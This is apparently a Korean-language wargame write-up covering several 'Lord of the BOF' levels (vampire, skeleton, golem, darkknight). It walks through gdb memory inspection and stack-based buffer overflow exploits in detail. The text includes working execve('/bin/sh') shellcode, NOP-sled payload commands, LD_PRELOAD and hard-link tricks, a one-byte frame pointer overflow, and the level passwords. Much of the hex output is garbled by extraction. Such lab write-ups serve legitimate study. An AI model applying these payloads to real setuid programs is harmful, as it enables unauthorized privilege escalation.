xbffe75d0: 0x x x x xbffe75e0: 0x x x x xbffe75f0: 0x x x x xbffe7600: 0x x x x xbffe7610: 0x x x x xbffe7620: 0x x x x xbffe7630: 0x x x x xbffe7640: 0x x x x
21 0xbffe7650: 0x x x x (gdb) (Enter 누름 ) 아까넣어줬던대량의 nop들이보입니다. 0xbffe7660: 0x x x x xbffe7670: 0x x x x xbffe7680: 0x x x x xbffe7690: 0x x x x xbffe76a0: 0x x x x xbffe76b0: 0x x x x xbffe76c0: 0x x x x xbffe76d0: 0x x x x xbffe76e0: 0x x x x xbffe76f0: 0x x x x xbffe7700: 0x x x x xbffe7710: 0x x x x xbffe7720: 0x x x x xbffe7730: 0x x x x xbffe7740: 0x x x x xbffe7750: 0x x x x xbffe7760: 0x x x x xbffe7770: 0x x x x xbffe7780: 0x x x x xbffe7790: 0x x x x xbffe77a0: 0x x x x xbffe77b0: 0x x x x xbffe77c0: 0x x x x xbffe77d0: 0x x x x xbffe77e0: 0x x x x xbffe77f0: 0x x x x xbffe7800: 0x x x x xbffe7810: 0x x x x xbffe7820: 0x x x x xbffe7830: 0x x x x xbffe7840: 0x x x x xbffe7850: 0x x x x xbffe7860: 0x x x x xbffe7870: 0x x x x xbffe7880: 0x x x x 엔터로계속넘기다보면 끝에넣어줬던쉘코드가있습니다. 0xbffffab0: 0x x x x xbffffac0: 0x x x x xbffffad0: 0x6850c031 0x68732f2f 0x69622f68 0x50e3896e 0xbffffae0: 0x99e x80cd0bb0 0x x 쉘코드는리틀엔디안형태로존재합니다. 0x6850c031 = \x31\xc0\x50\x68 이와같이인자를많이넣어주면 bfff~ 가아닌 bffe대역까지도인자가들어가게됩니다
22 fe대역아무거나골라잡아서리턴주소로삼겠습니다. -페이로드 [nop 44]+[ret 4]+[nop ]+[shellcode 24] 원본에다가바로시도하겠습니다. troll]$./vampire $(python -c 'print "\x90"*44+"\xe0\x76\xfe\xbf"+"\x90"* "\x31\xc0 \x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80\x20"')?? ====== 중 = 간 == 생 = 략 ====== 1?h//shh/bin?S? 것 bash$ whoami vampire bash$ id uid=508(troll) gid=508(troll) euid=509(vampire) egid=509(vampire) groups=508(troll) bash$ my-pass euid = 509 music world bash$ exit exit 0x0a vampire [vampire@localhost vampire]$ bash2 [vampire@localhost vampire]$ cat skeleton.c #include <stdio.h> #include <stdlib.h> extern char **environ; main(int argc, char *argv[]) char buffer[40]; int i, saved_argc; if(argc < 2) printf("argv error\n"); // egghunter for(i=0; environ[i]; i++) memset(environ[i], 0, strlen(environ[i])); if(argv[1][47]!= '\xbf')
23 printf("stack is still your friend.\n"); // check the length of argument if(strlen(argv[1]) > 48) printf("argument is too long!\n"); // argc saver saved_argc = argc; strcpy(buffer, argv[1]); printf("%s\n", buffer); // buffer hunter memset(buffer, 0, 40); // ultra argv hunter! for(i=0; i<saved_argc; i++) memset(argv[i], 0, strlen(argv[i])); ultra argv hunter가나왔네요. 0이된 argv[0] 을보기위해사본파일을만들고실행시켜봅니다. [vampire@localhost vampire]$ vi ukeleton.c [vampire@localhost vampire]$ gcc -o ukeleton ukeleton.c [vampire@localhost vampire]$./ukeleton $(python -c 'print "\x90"*44+"\xff\xff\xff\xbf"') 0xbffffc23 Segmentation fault (core dumped) 이번에도 core 덤프를이용해봅시다 [vampire@localhost vampire]$ gdb -q ukeleton core Core was generated by ` '. Program terminated with signal 11, Segmentation fault. Reading symbols from /lib/libc.so.6...done. Reading symbols from /lib/ld-linux.so.2...done. #0 0xbfffffff in?? () (gdb) x/120bx 0xbffffc23 0xbffffc23: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0xbffffc2b: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0xbffffc33: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0xbffffc3b: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0xbffffc43: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0xbffffc4b: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0xbffffc53: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x
24 0xbffffc5b: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0xbffffc63: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0xbffffc6b: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0xbffffc73: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0xbffffc7b: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0xbffffc83: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0xbffffc8b: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0xbffffc93: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 (gdb) 계속해서엔터를쳐도널이나옵니다만.. 0xbffffc9b: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00... (gdb) 0xbfffffe3: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0xbfffffeb: 0x00 0x00 0x00 0x00 0x00 0x00 0x2e 0x2f 0xbffffff3: 0x75 0x6b 0x65 0x6c 0x65 0x74 0x6f 0x6e 0xbffffffb: 0x00 0x00 0x00 0x00 0x00 Cannot access memory at address 0xc 스택끝자락에가보니뭔가보입니다 (?) (gdb) x/10s 0xbfffffeb 0xbfffffeb: "" 0xbfffffec: "" 0xbfffffed: "" 0xbfffffee: "" 0xbfffffef: "" 0xbffffff0: "" 0xbffffff1: "./ukeleton" 0xbffffffc: "" 0xbffffffd: "" 0xbffffffe: " 출력해보니왜그런진몰라도 argv[0] 의쌍둥이 (?) 가존재합니다. main() vampire]$ gcc -o main main.c vampire]$ gdb -q main (gdb) b main Breakpoint 1 at 0x804839b (gdb) r Starting program: /home/vampire/main Breakpoint 1, 0x804839b in main () (gdb) x/10s 0xbfffffeb 0xbfffffeb: "ome/vampire/main" 0xbffffffc: "" 0xbffffffd: "" 0xbffffffe: "" 0xbfffffff: "" 0xc : <Address 0xc out of bounds> 혹시몰라서다른프로그램도해보니마찬가지네요 ( 앞쪽에 /h가잘려나간듯 )
25 vampire]$ mv main $(python -c 'print "A"*200+"shellcode\x90\x90\x90"*2') 이름바꾸고 gdb로확인해보면 Breakpoint 1, 0x804839b in main () (gdb) x/120bx 0xbfffffc0 0xbfffffc0: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0xbfffffc8: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0xbfffffd0: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0xbfffffd8: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0xbfffffe0: 0x41 0x41 0x41 0x73 0x68 0x65 0x6c 0x6c 0xbfffffe8: 0x63 0x6f 0x64 0x65 0x90 0x90 0x90 0x73 0xbffffff0: 0x68 0x65 0x6c 0x6c 0x63 0x6f 0x64 0x65 0xbffffff8: 0x90 0x90 0x90 0x00 0x00 0x00 0x00 0x00 0xc : Cannot access memory at address 0xc (gdb) x/2s 0xbfffffc0 0xbfffffc0: 'A' <repeats 35 times>, "shellcode\220\220\220shellcode\220\220\220" 0xbffffffc: "" 쉘코드로가정한코드가잘있습니다. vampire]$ mkdir -p $(python -c 'print "A"*200+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68 \x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"') 링크걸기전에마지막 \x2f전까지만디렉터리만들어주고 vampire]$ ln /home/vampire/skeleton $(python -c 'print "A"*200+"\x31\xc0\x50\x68\x 2f\x2f\x73\x68\x68"') 이번엔하드링크를걸어보았습니다. -페이로드 [./]+[A 200]+[shellcode 24]+[ ( 공백 )]+[nop 44]+[ret 4] 여기서 A도 nop와같은역할을합니다. [vampire@localhost vampire]$./$(python -c 'print "A"*200+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62 \x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"+"\x20"+"\x90"*44+"\xc0\xff\xff\xbf"')? bash$ whoami skeleton bash$ id uid=509(vampire) gid=509(vampire) euid=510(skeleton) egid=510(skeleton) groups=509(vampire) bash$ my-pass euid = 510 shellcoder bash$ exit exit 0x0b skeleton [skeleton@localhost skeleton]$ bash2 [skeleton@localhost skeleton]$ cat golem.c #include <stdio.h> #include <stdlib.h> extern char **environ;
26 main(int argc, char *argv[]) char buffer[40]; int i; if(argc < 2) printf("argv error\n"); if(argv[1][47]!= '\xbf') printf("stack is still your friend.\n"); strcpy(buffer, argv[1]); printf("%s\n", buffer); // stack destroyer! memset(buffer, 0, 44); memset(buffer+48, 0, 0xbfffffff - (int)(buffer+48)); 프롤로그때소개드렸던악명높은 (?) stack destroyer입니다. 잘보시면버퍼시작주소부터 sfp까지 \x00으로덮어주고 buffer[48] 부터 0xbffffff까지를싹덮어줍니다. ret 영역만빼면쓸공간이없습니다. 이쯤에서원정대메인을보죠. [RULE] - do not use local root exploit - do not use LD_PRELOAD to my-pass - do not use single boot [h4ck3rsch001] LD_PRELOAD가눈에들어옵니다. LD_PRELOAD란프로그램이공유라이브러리에서함수를가져오기전에원하는라이브러리의경로를먼저등록시켜두는환경변수로, hosts 파일과비슷한개념입니다. 이것에값을넣으면스택에잔재가남아있게됩니다. 어차피경로를넣어줘야되니경로를쉘코드로만들어줍시다. [skeleton@localhost skeleton]$ mkdir -p $(python -c 'print "\x90"*150+"\x31\xc0\x50\x68\x2f\x2f\x73\x68 \x68"') [skeleton@localhost skeleton]$ cat > lib.c lib_main() 라이브러리를만들기위해 gcc 컴파일러의 shared와 fpic 옵션을추가해줍니다. ( 참고 ) [skeleton@localhost skeleton]$ gcc lib.c -fpic -shared -o $(python -c 'print "\x90"*150+"\x31\xc0\x50\x68 \x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"') 이제환경변수등록후사본을만들어 core 덤프를보는일만남았습니다. [skeleton@localhost skeleton]$ export LD_PRELOAD="/home/skeleton/$(python -c 'print "\x90"*150+"\x31\x
27 c0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"') skeleton]$ cp golem golee skeleton]$ ldd./golee /home/skeleton/ 1?h//shh/bin?S? 것 => /home/skeleton/ 1?h//shh/bin?S? 것 (0x ) libc.so.6 => /lib/libc.so.6 (0x4001a000) /lib/ld-linux.so.2 => /lib/ld-linux.so.2 (0x ) skeleton]$./golee $(python -c 'print "\xbf"*48') 옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜 Segmentation fault (core dumped) skeleton]$ gdb -q golee core Core was generated by ` '. Program terminated with signal 11, Segmentation fault. Reading symbols from /home/skeleton/ 1?h//shh/bin?S? 것...done. Reading symbols from /lib/libc.so.6...done. Reading symbols from /lib/ld-linux.so.2...done. #0 0xbfbfbfbf in?? () (gdb) x/120xw $esp xbffff444: 0x x40013c00 0x400002f4 0x40013c00 0xbffff454: 0x x x x40014ac8 0xbffff464: 0x xbffff488 0x x400140d8 0xbffff474: 0x01ee5739 0xbffff520 0x40000edc 0x xbffff484: 0x40013c00 0x xbffff550 0x a 0xbffff494: 0x207380f4 0xffffffff 0xffffffd0 0x xbffff4a4: 0x x x x xbffff4b4: 0x x x xbffff9f0 0xbffff4c4: 0x x400017f4 0x x4001a0e8 0xbffff4d4: 0x x x xbffff9e8 0xbffff4e4: 0xbffff9c3 0x b 0x x xbffff4f4: 0xffffffff 0x x400002f4 0x080482d0 0xbffff504: 0x080482d0 0xbffff550 0x x40023fd0 0xbffff514: 0x40013c00 0x4000ba15 0x x xbffff524: 0x400041b0 0x xbffff538 0x xbffff534: 0x000002c8 0x x080482d0 0x xbffff544: 0x c 0x xbffff558 0x400075bb
28 0xbffff554: 0x x x xbffff754 0xbffff564: 0x e 0x x6d6f682f 0x6b732f65 0xbffff574: 0x74656c65 0x902f6e6f 0x x xbffff584: 0x x x x xbffff594: 0x x x x xbffff5a4: 0x x x x xbffff5b4: 0x x x x xbffff5c4: 0x x x x xbffff5d4: 0x x x x xbffff5e4: 0x x x x xbffff5f4: 0x x x x xbffff604: 0x x x x50c xbffff614: 0x732f2f68 0x622f6868 0xe3896e69 0xe (gdb) buffer 배열보다낮은곳에 nop분들이거주하고계십니다 ;D -페이로드 [garbage 36][ret 4] skeleton]$./golee $(python -c 'print "\xb4\xf5\xff\xbf"*12') 더였? 였? 였? 였? 였? 였? 였? 였? 였? 였? 였? bash$ exit exit 이제원본에시도합시다. skeleton]$./golem $(python -c 'print "\xb4\xf5\xff\xbf"*12') 더였? 였? 였? 였? 였? 였? 였? 였? 였? 였? 였? bash$ whoami golem bash$ id uid=510(skeleton) gid=510(skeleton) euid=511(golem) egid=511(golem) groups=510(skeleton) bash$ my-pass euid = 511 cup of coffee bash$ exit exit 0x0c golem 골렘입니다. 어쩌다보니이미지가날아가서아는분한테새로받았는데앞부분에도주석이있네요. [golem@localhost golem]$ cat darkknight.c /* The Lord of the BOF : The Fellowship of the BOF - darkknight - FPO */ #include <stdio.h> #include <stdlib.h>
29 void problem_child(char *src) char buffer[40]; strncpy(buffer, src, 41); printf("%s\n", buffer); main(int argc, char *argv[]) if(argc<2) printf("argv error\n"); problem_child(argv[1]); problem_child 함수에서 argv[1] 가 buffer배열로 41개까지복사됩니다. 1Byte overflow네요. Frame Pointer Overflow입니다. 예시 ) 41Byte의인자로 \x90을넣은경우 ( [golem@localhost golem]$./darknight $(python -c 'print "\x90"*41') ) sfp에원래들어있던값이 0xbffffa08이라가정한다면여기선메모리가 Little-Endian 방식으로쓰이므로 08 fa ff bf로쓰여있습니다. 따라서 41번째인자가 sfp의첫부분을침범하므로메모리에있던 sfp는 90 fa ff bf로 0xbffffa90이되었습니다. 하지만어떻게 sfp를 1byte를바꾸는것만으로실행흐름을조작할수있을까요? 지금부터본격적으로나갑니다. [golem@localhost golem]$ cp darkknight ddrkknight [golem@localhost golem]$ gdb -q ddrkknight (gdb) disassemble main Dump of assembler code for function main: 0x804846c <main>: push %ebp 0x804846d <main+1>: mov %esp,%ebp 0x804846f <main+3>: cmpl $0x1,0x8(%ebp) 0x <main+7>: jg 0x <main+36> 0x <main+9>: push $0x x804847a <main+14>: call 0x <printf> 0x804847f <main+19>: add $0x4,%esp 0x <main+22>: push $0x0 0x <main+24>: call 0x <exit> 0x <main+29>: add $0x4,%esp 0x804848c <main+32>: lea 0x0(%esi,1),%esi 0x <main+36>: mov 0xc(%ebp),%eax 0x <main+39>: add $0x4,%eax 0x <main+42>: mov (%eax),%edx 0x <main+44>: push %edx 0x <main+45>: call 0x <problem_child> 0x804849e <main+50>: add $0x4,%esp 0x80484a1 <main+53>: leave
30 0x80484a2 <main+54>: ret 0x80484a3 <main+55>: nop 0x80484a4 <main+56>: nop 0x80484a5 <main+57>: nop 0x80484a6 <main+58>: nop 0x80484a7 <main+59>: nop 0x80484a8 <main+60>: nop 0x80484a9 <main+61>: nop 0x80484aa <main+62>: nop 0x80484ab <main+63>: nop 0x80484ac <main+64>: nop 0x80484ad <main+65>: nop 0x80484ae <main+66>: nop 0x80484af <main+67>: nop End of assembler dump. (gdb) disassemble problem_child Dump of assembler code for function problem_child: 0x <problem_child>: push %ebp 0x <problem_child+1>:mov %esp,%ebp 0x <problem_child+3>: sub $0x28,%esp 0x <problem_child+6>: push $0x29 0x <problem_child+8>: mov 0x8(%ebp),%eax 0x804844b <problem_child+11>: push %eax 0x804844c <problem_child+12>: lea 0xffffffd8(%ebp),%eax 0x804844f <problem_child+15>: push %eax 0x <problem_child+16>: call 0x <strncpy> 0x <problem_child+21>: add $0xc,%esp 0x <problem_child+24>: lea 0xffffffd8(%ebp),%eax 0x804845b <problem_child+27>: push %eax 0x804845c <problem_child+28>: push $0x x <problem_child+33>: call 0x <printf> 0x <problem_child+38>: add $0x8,%esp 0x <problem_child+41>: leave 0x804846a <problem_child+42>: ret 0x804846b <problem_child+43>: nop End of assembler dump. 여기서 bold한부분이중점적으로볼부분들입니다. (gdb) break *main Breakpoint 1 at 0x804846c (0x804846c <main>: push %ebp) (gdb) break *main+1 Breakpoint 2 at 0x804846d (0x804846d <main+1>: mov %esp,%ebp) (gdb) break main
31 Breakpoint 3 at 0x804846f (0x804846f <main+3>: cmpl $0x1,0x8(%ebp) ) main 은 *main 과달리 stack 이형성된바로그다음시점을의미합니다. 함수프롤로그라고불리기도하죠. (gdb) break *main+45 Breakpoint 4 at 0x (problem_child 호출직전 ) (0x <main+45>: call 0x <problem_child>) (gdb) break *problem_child Breakpoint 5 at 0x (0x <problem_child>: push %ebp) (gdb) break *problem_child+1 Breakpoint 6 at 0x (0x <problem_child+1>: mov %esp,%ebp) (gdb) break *problem_child+3 Breakpoint 7 at 0x (0x <problem_child+3>: sub $0x28,%esp) (gdb) break problem_child Breakpoint 8 at 0x (0x <problem_child+6>: push $0x29) 위와마찬가지 (gdb) b *problem_child+41 Breakpoint 9 at 0x (0x <problem_child+41>: leave) (gdb) break *problem_child+42 Breakpoint 10 at 0x804846a (0x804846a <problem_child+42>: ret) (gdb) break *main+53 Breakpoint 11 at 0x80484a1 (0x80484a1 <main+53>: leave) (gdb) break *main+54 Breakpoint 12 at 0x80484a2 (0x80484a2 <main+54>: ret) 총 12 개의 breakpoint 를걸었습니다. - 알아두기 - ESP : 스택의상단을가리키는레지스터 EBP : BasePointer 라고불리며이전함수의 stack frame pointer 값을기억하는레지스터
32 EIP : 다음에수행할명령을가리키는레지스터 ( 함수를마칠때는리턴어드레스가됨 ) 실제로 EBP ESP EIP가위의역할을하는지살펴보죠. 이번엔 0x50을넣고실행해보겠습니다. (gdb) run $(python -c 'print "\x50"*41') Starting program: /home/golem/ddrkknight $(python -c 'print "\x50"*41') Breakpoint 1, 0x804846c in main () (gdb) info registers ebp esp eip ebp 0xbffffaf esp 0xbffffadc eip 0x804846c ebp push 전 (gdb) nexti Breakpoint 2, 0x804846d in main () (gdb) info registers ebp esp eip ebp 0xbffffaf esp 0xbffffad eip 0x804846d ebp push 후 (gdb) nexti 0x804846f in main () (gdb) info registers ebp esp eip ebp 0xbffffad esp 0xbffffad eip 0x804846f mov %esp,%ebp 수행후여기까진 ebp를 push해서이전의 stack frame pointer 값을기억시키고 ebp에 esp의값을옮겨새로운스택을형성했습니다. (gdb) continue Continuing. 계속해서보겠습니다. Breakpoint 4, 0x in main () (gdb) info registers ebp esp eip ebp 0xbffffad esp 0xbffffad eip 0x problem_child call 직전 (gdb) continue Continuing. Breakpoint 5, 0x in problem_child () (gdb) info registers ebp esp eip ebp 0xbffffad
33 esp 0xbffffad eip 0x problem_child call 후 call문의수행으로 esp의값이바뀌었습니다. ( 다음위치에있는명령이 stack에 push 되기때문 ) (gdb) nexti Breakpoint 6, 0x in problem_child () (gdb) info registers ebp esp eip ebp 0xbffffad esp 0xbffffacc eip 0x problem_child 진입후 esp가다른곳으로바뀌었습니다. 새로운스택을형성하기위한단계입니다. 여기서이전함수의 stack frame pointer 값을기억하기위해 ebp는 push 되어 esp는 0x4만큼 sub되었습니다. (gdb) nexti Breakpoint 7, 0x in problem_child () (gdb) info registers ebp esp eip ebp 0xbffffacc esp 0xbffffacc eip 0x mov %esp,%ebp 수행후 ebp가 esp와같아졌습니다. (gdb) nexti 0x in problem_child () (gdb) info registers ebp esp eip ebp 0xbffffacc esp 0xbffffaa eip 0x sub $0x28,%esp 수행후 esp가 0x28만큼줄어들었습니다. 여기까지가 problem_child의함수프롤로그입니다. (gdb) continue Continuing. PPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPP?? 9? 원? Breakpoint 9, 0x in problem_child () (gdb) info registers ebp esp eip ebp 0xbffffacc esp 0xbffffaa eip 0x leave 수행직전 (gdb) nexti 0x804846a in problem_child () (gdb) info registers ebp esp eip
34 ebp 0xbffffa esp 0xbffffad eip 0x804846a leave 수행후, ret 수행직전다시스택을반환하는과정입니다. 아까와는반대로 leave에선 mov %ebp, %esp와 pop %ebp가일어납니다. 그런데보시는바와같이아까넣었던 50으로인해 pop ebp할때 ebp 값이변했습니다. 또한이것으로 esp는 4byte증가하게됩니다. (gdb) nexti 0x804849e in main () (gdb) info registers ebp esp eip ebp 0xbffffa esp 0xbffffad eip 0x804849e ret 수행후 ret명령은증가한 esp는 eip에참조한후 eip를리턴어드레스로인식해서다음실행할주소로넘어갑니다. (gdb) continue Continuing. Breakpoint 11, 0x80484a1 in main () (gdb) info registers ebp esp eip ebp 0xbffffa esp 0xbffffad eip 0x80484a add $0x4,%esp 수행후, leave 수행직전다시 main함수로진입하여 esp에 4를더합니다. (gdb) nexti 0x80484a2 in main () (gdb) info registers ebp esp eip ebp 0x400143e esp 0xbffffa eip 0x80484a (gdb) nexti leave 수행후, ret 수행직전이번엔 main에서일어난 leave입니다. 마찬가지로 ebp를 esp에옮긴후 pop ebp를합니다. (ebp엔맨처음에 0x804846c에서 push했던 ebp가복원됩니다.) 덕분에 ebp의값을이어받은 esp는 4만큼증가하여 0xbffffa54가됩니다. Program received signal SIGSEGV, Segmentation fault. 0x40021df3 in?? () from /lib/libc.so.6 (gdb) info registers ebp esp eip ebp 0x400143e esp 0x401088c eip 0x40021df
35 ret 수행후 esp를참조하여점프하게되면아직점프한곳엔실행할쉘코드를넣어놓지않았습니다. 근본적으론참조할 esp에정상적인주소가적혀있지않을겁니다. Segmentation fault신호를받게되죠. Segmentation fault받은후 ddrkknight은종료되어프로그램은실행하기전으로원래대로돌아가게됩니다. (gdb) nexti Program terminated with signal SIGSEGV, Segmentation fault. The program no longer exists. (gdb) q 따라서정상적인종료가아닌 Segmentation fault가되었습니다. 전체적인흐름을보았으면이제이원리를압축 (?) 합시다. problem_child 함수내부에서 leave명령중 pop ebp 부분에의해우리가 overflow시킨값 1byte가변경됩니다. 다시 main으로돌아와서 leave명령을수행하면 ebp의값은 esp로이동하게되고 esp는 pop ebp로인해 4만큼증가합니다. 이때다음명령인 ret명령이 esp에있는부분을 eip에참조한후리턴어드레스로쓰므로결국 50+4 인 0xbffffa54를 eip에참조하게됩니다. 따라서우리는 SFP 1byte변조하여 eip부분에참조하길원하는위치가예를들어 0xbffffa54인경우./darkknight $(python -c 'print "\x50"*41') 0xbffffa88인경우./darkknight $(python -c 'print "\x84"*41') 그렇다면참조하길원하는위치는어떤위치가좋을까요? 우리가자유롭게값을넣을수있는공간이어야합니다. 환경변수에리턴어드레스를넣을려면 1byte만가까스로변경가능했기때문에주소가좀먼곳에있을것같습니다. 대체어디를리턴어드레스를넣는공간으로써야될까요? 저는아까쓰였던 buffer 배열을쓰겠습니다. 가장가까운주소일것같군요. 1byte 를변경해서 buffer 배열을 esp 가가리키게만들수있습니다. buffer 배열의시작점이든끝점이든어디든리틀엔디언방식으로아무데나리턴어드레스를 4byte 를넣어서사용할수 있습니다. 그럼지금부터확인해보도록하죠. [golem@localhost golem]$ gdb -q ddrkknight (gdb) b *main+54 main함수의 ret 직전에 bp를걸었습니다. Breakpoint 1 at 0x80484a2 (gdb) r $(python -c 'print "\x50"*41') Starting program: /home/golem/ddrkknight $(python -c 'print "\x50"*41') PPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPP?? 9? 원? Breakpoint 1, 0x80484a2 in main () (gdb) info registers esp esp 0xbffffa 예상대로 50+4인 54로 esp가변경되었습니다
36 (gdb) x/120bx $esp 0xbffffa54: 0xf0 0x1d 0x02 0x40 0xc0 0x88 0x10 0x40 0xbffffa5c: 0x2c 0x98 0x02 0x40 0xf0 0x1d 0x02 0x40 0xbffffa64: 0x94 0xfa 0xff 0xbf 0x70 0xa9 0x00 0x40 0xbffffa6c: 0x62 0xfc 0xff 0xbf 0xcc 0xfa 0xff 0xbf 0xbffffa74: 0x20 0xd9 0x05 0x40 0xe0 0x43 0x01 0x40 0xbffffa7c: 0x94 0xfa 0xff 0xbf 0x70 0x60 0x06 0x40 0xbffffa84: 0x80 0x69 0x10 0x40 0x00 0x85 0x04 0x08 0xbffffa8c: 0xa4 0xfa 0xff 0xbf 0xec 0x81 0x10 0x40 0xbffffa94: 0xcc 0xfa 0xff 0xbf 0x66 0x84 0x04 0x08 0xbffffa9c: 0x00 0x85 0x04 0x08 0xa4 0xfa 0xff 0xbf 0xbffffaa4: 0x50 0x50 0x50 0x50 0x50 0x50 0x50 0x50 0xbffffaac: 0x50 0x50 0x50 0x50 0x50 0x50 0x50 0x50 0xbffffab4: 0x50 0x50 0x50 0x50 0x50 0x50 0x50 0x50 0xbffffabc: 0x50 0x50 0x50 0x50 0x50 0x50 0x50 0x50 0xbffffac4: 0x50 0x50 0x50 0x50 0x50 0x50 0x50 0x50 0xbffffaa4-4 인 a0 으로 sfp 를변경한다면 ret 명령에의해 eip 에참조되는 esp 가 buffer 의시작부분인 0xbffffaa4 를 참조하게할수있겠네요. 그럼 buffer 시작부분엔 buffer 배열로의리턴주소를그다음부분에는적정량의 nop 를 sfp 전부분은쉘코드를넣는다면 공격은성공적일것입니다. 제가작성한페이로드는다음과같습니다. [ 리턴주소 4byte]+[nop 12byte]+[shellcode 24byte]+[sfp 1byte] 그런데 0xbffffa9c: 0x00 0x85 0x04 0x08 0xa4 0xfa 0xff 0xbf를보면이미 buffer배열의시작주소가존재하고있습니다. 이곳으로해보겠습니다. -페이로드 [ 리턴주소 4byte]( 앞에이미존재함 )+[nop 16byte]+[shellcode 24byte]+[sfp 1byte] 0xbffffa9c=0xbffffaa0-4 이므로 [golem@localhost golem]$./darkknight $(python -c 'print "\x90"*16+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x6 8\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"+"\x9c"') 1?h//shh/bin?S? 것?#156;??? 왠? Segmentation fault 그런데세그폴이뜨네요. 사본파일에시도해서 core를살펴보겠습니다. [golem@localhost golem]$./ddrkknight $(python -c 'print "\x90"*16+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x6 8\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"+"\x9c"') 1?h//shh/bin?S? 것?#156;??? 왠? Segmentation fault (core dumped) [golem@localhost golem]$ gdb -q ddrkknight core Core was generated by `./ddrkknight 1?h//shh/bin?S? 것?#156;'
37 Program terminated with signal 11, Segmentation fault. Reading symbols from /lib/libc.so.6...done. Reading symbols from /lib/ld-linux.so.2...done. #0 0x50e3896e in?? () (gdb) x/120bx 0xbffffa9c 0xbffffa9c: 0x68 0x2f 0x62 0x69 0x6e 0x89 0xe3 0x50 0xbffffaa4: 0x53 0x89 0xe1 0x99 0xb0 0x0b 0xcd 0x80 0xbffffaac: 0x9c 0xfa 0xff 0xbf 0x9e 0x84 0x04 0x08 0xbffffab4: 0x1d 0xfc 0xff 0xbf 0xd8 0xfa 0xff 0xbf 0xbffffabc: 0xcb 0x09 0x03 0x40 0x02 0x00 0x00 0x00 0xbffffac4: 0x04 0xfb 0xff 0xbf 0x10 0xfb 0xff 0xbf 0xbffffacc: 0x68 0x38 0x01 0x40 0x02 0x00 0x00 0x00 0xbffffad4: 0x90 0x83 0x04 0x08 0x00 0x00 0x00 0x00 0xbffffadc: 0xb1 0x83 0x04 0x08 0x6c 0x84 0x04 0x08 0xbffffae4: 0x02 0x00 0x00 0x00 0x04 0xfb 0xff 0xbf 0xbffffaec: 0xe4 0x82 0x04 0x08 0xdc 0x84 0x04 0x08 0xbffffaf4: 0x60 0xae 0x00 0x40 0xfc 0xfa 0xff 0xbf 0xbffffafc: 0x90 0x3e 0x01 0x40 0x02 0x00 0x00 0x00 0xbffffb04: 0x10 0xfc 0xff 0xbf 0x1d 0xfc 0xff 0xbf 0xbffffb0c: 0x00 0x00 0x00 0x00 0x47 0xfc 0xff 0xbf (gdb) 계속해서살펴보아도.. 0xbffffb14: 0x57 0xfc 0xff 0xbf 0x70 0xfc 0xff 0xbf 0xbffffb1c: 0x8f 0xfc 0xff 0xbf 0xb1 0xfc 0xff 0xbf 0xbffffb24: 0xbc 0xfc 0xff 0xbf 0x7f 0xfe 0xff 0xbf 0xbffffb2c: 0x9e 0xfe 0xff 0xbf 0xb9 0xfe 0xff 0xbf 0xbffffb34: 0xce 0xfe 0xff 0xbf 0xeb 0xfe 0xff 0xbf 0xbffffb3c: 0xf6 0xfe 0xff 0xbf 0x0e 0xff 0xff 0xbf 0xbffffb44: 0x1c 0xff 0xff 0xbf 0x24 0xff 0xff 0xbf 0xbffffb4c: 0x35 0xff 0xff 0xbf 0x3f 0xff 0xff 0xbf 0xbffffb54: 0x4d 0xff 0xff 0xbf 0x5e 0xff 0xff 0xbf 0xbffffb5c: 0x6c 0xff 0xff 0xbf 0x77 0xff 0xff 0xbf 0xbffffb64: 0x88 0xff 0xff 0xbf 0xc9 0xff 0xff 0xbf 0xbffffb6c: 0xd8 0xff 0xff 0xbf 0x00 0x00 0x00 0x00 0xbffffb74: 0x03 0x00 0x00 0x00 0x34 0x80 0x04 0x08 0xbffffb7c: 0x04 0x00 0x00 0x00 0x20 0x00 0x00 0x00 0xbffffb84: 0x05 0x00 0x00 0x00 0x06 0x00 0x00 0x00 아무리살펴봐도없습니다. gdb에서보여주는메모리는실제주소와어느정도차이가있다고하네요. (gdb) info registers esp esp 0xbffffaa 결국 esp를살펴보고 (gdb) x/120bx $esp-120 거기서 esp에서적당히뺀부분을보면 0xbffffa2c: 0x04 0xfb 